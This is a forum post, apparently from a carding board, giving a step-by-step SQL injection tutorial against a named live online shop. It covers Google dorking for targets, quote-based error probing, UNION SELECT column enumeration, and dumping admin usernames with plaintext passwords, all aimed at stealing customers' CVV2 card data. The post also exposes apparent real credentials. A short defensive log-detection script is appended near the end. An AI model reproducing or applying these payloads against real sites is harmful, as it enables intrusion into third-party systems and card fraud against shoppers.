Hacking Lesson

ghostsee

1. Microsoft JET Database Engine Hacking (with live example shop)

.Open your web browser. Use Mozilla Firefox to hack shops. This will show errors in shops. Don't use Microsoft Explorer because you will not see errors in shops.

.Google will help us find shops to hack. If you have any URL link extractor like GURLE, that is good too. But for starters, open www.google.com

.Now we use dorks, or bugs as you may call them, to search for shops (example shop.asp?id=). Type "allinurl:shopdisplayproducts.asp?id=" in www.google.com and search. You will see many shops whose links end in numbers (example http://shopping.ethnix.co.za/shopdis...ducts.asp?id=3). We use this shop as an example to hack.

.Now open the shop in new tab

.We check if the shop is hackable. We do that by adding ' or '' to the last number in the URL link and pressing enter. It will be as follows
http://shopping.ethnix.co.za/shopdisplayproducts.asp?id=3'
(you will see an error on the screen page, which means the shop is hackable)

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 3' and hide=0 order by specialoffer desc,cname'.

/shop$db.asp, line 325


.Since the shop is hackable, we find the username and the password.We do it by removing the ' after 3 and replacing it with this code %20union%20%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,7 6,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100%20fro m%20tbluser%27

it will be like this in the url link

http://shopping.ethnix.co.za/shopdi...3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99,100%20from%20tbluser%27

What do you see on the screen page? You will see this

Microsoft JET Database Engine error '80040e14'

The number of columns in the two selected tables or queries of a union query do not match.

/shop$db.asp, line 325

This means that the number of columns in the queries do match. We need to reduce the numbers in the columns one after the other till we find a page with pictures.


.Now we reduce the numbers by deleting ,100 from the columns.
It will be like this

http://shopping.ethnix.co.za/shopdi...3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99%20from%20tbluser%27

What do you see on the screen page? You will see this

Microsoft JET Database Engine error '80040e14'

The number of columns in the two selected tables or queries of a union query do not match.

/shop$db.asp, line 325

This means that the numbers in the columns still do not match. We still need to reduce the numbers.


.Now we delete ,99 from the column numbers.
It will be like this

http://shopping.ethnix.co.za/shopdi...3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98%20from%20tbluser%27
What do you see on the screen page? You will see this
Microsoft JET Database Engine error '80040e14'

The number of columns in the two selected tables or queries of a union query do not match.

/shop$db.asp, line 325

Still the numbers do not match. We need to reduce the numbers until we see a page with a picture.


.Now let us assume we reduce the numbers to 43.
it will be like this
http://shopping.ethnix.co.za/shopdi...3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43%20from%20tbluser%27

What do you see on the screen page? You will see this. You will see a page with numbers on screen.

.Now we get the username and password by replacing "fldusername%2b'%20//%20'%2bfldPassword" with 3 in the number of columns.(NB: we do that because the image of 3 is not showing which means it has the username and password.)

it will be like this

http://shopping.ethnix.co.za/shopdi...1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20tbluser%27
What do you see on the screen page? You will see these different usernames and passwords

admin // webspinner
Jose // madrid
mikka // zatanaz

.Hurray we hacked the username and password.


.We need to enter the admin home page to get all cvv2 from shop.

.We hacked the admin link by this code
%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43%20from%20configuration%27

(NB: note that the numbers in the columns had been reduced to 43, since that is where we got a page with pictures)

.Now we replace number 3 in the columns with "fieldname%2b%27/%27%2bfieldvalue"
so it will be like this
http://shopping.ethnix.co.za/shopdi...11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20configuration%27

What do you see on the screen page? You will see this
affallowaffiliatesrevieworders/No
affcommissionincludesallorders/No
xadminpage/shopadmin.asp

.Now we hacked the admin link.

http://shopping.ethnix.co.za/shopadmin.asp
we enter username and password to get cvv2.

END OF CLASS

IF YOU DON'T UNDERSTAND, CONTACT ME.


Don't forget to say thanks
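
Seen from the server side, the procedure in the post above leaves a distinctive trail in access logs: a lone quote answered with a server error, then UNION SELECT requests against one parameter whose column count changes step by step. The detection sketch below is an added example, not part of the original post; the log layout, sample lines and function name are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample in a simplified "client method uri status" layout
# (assumed format, not from a real server; addresses are documentation ranges).
SAMPLE_LOG = """\
192.0.2.10 GET /shopdisplayproducts.asp?id=3 200
192.0.2.10 GET /shopdisplayproducts.asp?id=3' 500
192.0.2.10 GET /shopdisplayproducts.asp?id=3%20union%20select%201,2,3,4,5%20from%20t%27 500
192.0.2.10 GET /shopdisplayproducts.asp?id=3%20union%20select%201,2,3,4%20from%20t%27 500
192.0.2.10 GET /shopdisplayproducts.asp?id=3%20union%20select%201,2,3%20from%20t%27 200
198.51.100.7 GET /shopdisplayproducts.asp?id=12 200
198.51.100.7 GET /search.asp?q=trade+union+select+committee 200
"""

# UNION [ALL] SELECT <list> FROM: requiring the FROM keeps ordinary search text out.
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\s+(.+?)\s+from\b", re.I)


def find_union_enumeration(log_text):
    """Return {(client, path): record} for clients varying a UNION column count."""
    seen = defaultdict(lambda: {"counts": [], "quote_errors": 0, "union_ok": False})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # line does not fit the assumed layout
        client, _method, uri, status = parts
        path, _, query = uri.partition("?")
        decoded = unquote_plus(query)
        rec = seen[(client, path)]
        match = UNION_RE.search(decoded)
        if match:
            # Column count = comma-separated items in the select list (heuristic).
            rec["counts"].append(match.group(1).count(",") + 1)
            # A non-5xx answer suggests the count matched and data came back.
            rec["union_ok"] |= not status.startswith("5")
        elif decoded.endswith("'") and status.startswith("5"):
            rec["quote_errors"] += 1  # lone quote that triggered a server error
    return {k: v for k, v in seen.items() if len(set(v["counts"])) >= 2}


if __name__ == "__main__":
    for (client, path), rec in find_union_enumeration(SAMPLE_LOG).items():
        print(client, path, rec)
```

A record with `union_ok` set calls for incident handling rather than just blocking the client. The durable fix is in the application: bind `id` as a typed query parameter and stop returning raw JET error text to the browser.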
 

hilffigure

Mind adding me to your ICQ 397856802? We really do need to talk, nice work here bro

---------- Post added at 02:36 AM ---------- Previous post was at 02:35 AM ----------

Lest I forget.........THANKS
 